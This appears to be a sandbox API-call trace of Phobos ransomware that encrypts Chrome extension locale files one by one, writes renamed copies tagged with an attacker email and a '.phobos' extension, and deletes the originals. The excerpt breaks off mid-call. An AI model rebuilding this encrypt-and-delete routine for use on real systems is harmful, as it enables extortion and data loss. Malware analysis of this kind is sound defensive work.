(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.970] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=260) returned 1 [0154.970] CloseHandle (hObject=0x130) returned 1 [0154.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json")) returned 0x2020 [0154.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.971] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.971] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.971] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.971] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.971] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x104, lpOverlapped=0x0) returned 1 [0154.972] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0154.972] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0154.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.973] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.973] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.974] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.974] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.974] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.974] CloseHandle (hObject=0x130) returned 1 [0154.974] CloseHandle (hObject=0x14c) returned 1 [0154.974] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json")) returned 1 [0154.975] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.976] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0154.976] CloseHandle (hObject=0x14c) returned 1 [0154.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json")) returned 0x2020 [0154.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.976] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.976] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.977] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.977] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.977] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0154.978] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.978] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.979] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.979] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.979] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.979] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.979] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.979] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.979] CloseHandle (hObject=0x14c) returned 1 [0154.979] CloseHandle (hObject=0x130) returned 1 [0154.980] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json")) returned 1 [0154.981] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.981] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=196) returned 1 [0154.981] CloseHandle (hObject=0x130) returned 1 [0154.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json")) returned 0x2020 [0154.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.982] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.982] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.982] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.982] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.982] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc4, lpOverlapped=0x0) returned 1 [0154.983] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0154.983] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0154.984] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.985] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.985] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.985] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.985] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.985] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.985] CloseHandle (hObject=0x130) returned 1 [0154.985] CloseHandle (hObject=0x14c) returned 1 [0154.985] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json")) returned 1 [0154.986] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.987] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=336) returned 1 [0154.987] CloseHandle (hObject=0x14c) returned 1 [0154.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json")) returned 0x2020 [0154.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.988] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.988] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.989] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.989] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.989] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x150, lpOverlapped=0x0) returned 1 [0154.990] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160, dwBufLen=0x160 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160) returned 1 [0154.990] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x160, lpOverlapped=0x0) returned 1 [0154.991] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.991] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.991] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.991] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.991] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.991] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.991] CloseHandle (hObject=0x14c) returned 1 [0154.991] CloseHandle (hObject=0x130) returned 1 [0154.991] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json")) returned 1 [0154.992] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.993] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=277) returned 1 [0154.993] CloseHandle (hObject=0x130) returned 1 [0154.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json")) returned 0x2020 [0154.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 